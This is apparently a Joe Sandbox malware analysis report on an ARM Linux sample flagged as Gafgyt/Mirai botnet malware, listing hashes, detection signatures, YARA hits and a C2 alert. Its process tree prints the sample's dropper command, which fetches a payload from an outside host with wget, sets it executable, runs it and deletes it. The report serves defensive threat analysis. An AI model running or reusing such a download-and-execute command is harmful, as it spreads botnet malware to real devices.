Edit tour

Linux Analysis Report
armv4l.elf

Overview

General Information

Sample name:	armv4l.elf
Analysis ID:	1686584
Has dependencies:	false
MD5:	2e540f8ae41ef4c6b81b7e3f76fb10a4
SHA1:	63dbd55249baa1b541f72f3024b1e22d8e72d512
SHA256:	8a31d94ac6c21de724e8fb226b77aeeabd2780298850dcadbc05724b643c4ad8
Tags:	elfuser-abuse_ch
Infos:

Detection

Gafgyt, Mirai

Score:	92
Range:	0 - 100

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Gafgyt

Yara detected Mirai

Opens /proc/net/* files useful for finding connected devices and routers

Creates hidden files and/or directories

Creates hidden files without content (potentially used as a mutex)

Detected TCP or UDP traffic on non-standard ports

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "rm" command used to delete files or directories

Executes the "wget" command typically used for HTTP/S downloading

Reads the 'hosts' file potentially containing internal network hosts

Sample contains strings that are user agent strings indicative of HTTP manipulation

Sample tries to set the executable flag

Sets full permissions to files and/or directories

Uses the "uname" system call to query kernel version information (possible evasion)

Yara signature match

Classification

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1686584
Start date and time:	2025-05-10 07:47:57 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	armv4l.elf
Detection:	MAL
Classification:	mal92.spre.troj.linELF@0/0@6/0

Warnings

VT rate limit hit for: gay.energy

Runtime Messages

Command:	/tmp/armv4l.elf
PID:	5509
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	gosh that chinese family at the other table sure ate alot
Standard Error:

Process Tree

system is lnxubuntu20

armv4l.elf (PID: 5509, Parent: 5429, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/armv4l.elf

armv4l.elf New Fork (PID: 5511, Parent: 5509)

sh (PID: 5511, Parent: 5509, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."

sh New Fork (PID: 5523, Parent: 5511)

wget (PID: 5523, Parent: 5511, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q http://gay.energy/.../vivid -O .....

sh New Fork (PID: 5524, Parent: 5511)

chmod (PID: 5524, Parent: 5511, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 .....

sh New Fork (PID: 5525, Parent: 5511)

sh (PID: 5525, Parent: 5511, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh ./.....

sh New Fork (PID: 5527, Parent: 5511)

rm (PID: 5527, Parent: 5511, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf .....

armv4l.elf New Fork (PID: 5513, Parent: 5509)

armv4l.elf New Fork (PID: 5514, Parent: 5509)

armv4l.elf New Fork (PID: 5517, Parent: 5514)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Bashlite, Gafgyt	Bashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.	No Attribution	http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/ https://blog.cyber5w.com/gafgyt-backdoor-analysis https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/ https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/ https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
armv4l.elf	JoeSecurity_Gafgyt	Yara detected Gafgyt	Joe Security
armv4l.elf	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
armv4l.elf	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x1573c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15750:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15764:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15778:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1578c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x157a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x157b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x157c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x157dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x157f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15804:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15818:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1582c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15840:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15854:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15868:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1587c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15890:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x158a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x158b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x158cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F

Memory Dumps

Source	Rule	Description	Author	Strings
5514.1.00007f6420017000.00007f6420030000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5514.1.00007f6420017000.00007f6420030000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x1573c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15750:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15764:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15778:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1578c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x157a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x157b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x157c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x157dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x157f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15804:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15818:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1582c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15840:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15854:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15868:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1587c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15890:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x158a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x158b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x158cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
5509.1.00007f6420017000.00007f6420030000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5509.1.00007f6420017000.00007f6420030000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x1573c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15750:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15764:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15778:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1578c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x157a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x157b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x157c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x157dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x157f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15804:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15818:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1582c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15840:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15854:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15868:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1587c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15890:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x158a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x158b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x158cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
5513.1.00007f6420017000.00007f6420030000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5513.1.00007f6420017000.00007f6420030000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x1573c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15750:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15764:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15778:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1578c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x157a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x157b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x157c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x157dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x157f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15804:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15818:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1582c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15840:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15854:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15868:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1587c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x15890:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x158a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x158b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x158cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: armv4l.elf PID: 5509	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Process Memory Space: armv4l.elf PID: 5509	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x13b64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13b78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13b8c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13ba0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13bb4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13bc8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13bdc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13bf0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13c04:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13c18:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13c2c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13c40:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13c54:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13c68:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13c7c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13c90:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13ca4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13cb8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13ccc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13ce0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13cf4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: armv4l.elf PID: 5513	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Process Memory Space: armv4l.elf PID: 5513	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x13ba1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13bb5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13bc9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13bdd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13bf1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13c05:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13c19:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13c2d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13c41:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13c55:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13c69:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13c7d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13c91:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13ca5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13cb9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13ccd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13ce1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13cf5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13d09:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13d1d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13d31:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: armv4l.elf PID: 5514	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Process Memory Space: armv4l.elf PID: 5514	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x1304c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13060:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13074:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13088:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1309c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x130b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x130c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x130d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x130ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13100:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13114:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13128:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1313c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13150:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13164:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13178:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1318c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x131a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x131b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x131c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x131dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Click to see the 7 entries

Suricata Signatures

ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-05-10T07:48:50.662762+0200	2839489	1	Malware Command and Control Activity Detected	92.60.77.69	666	192.168.2.14	40808	TCP
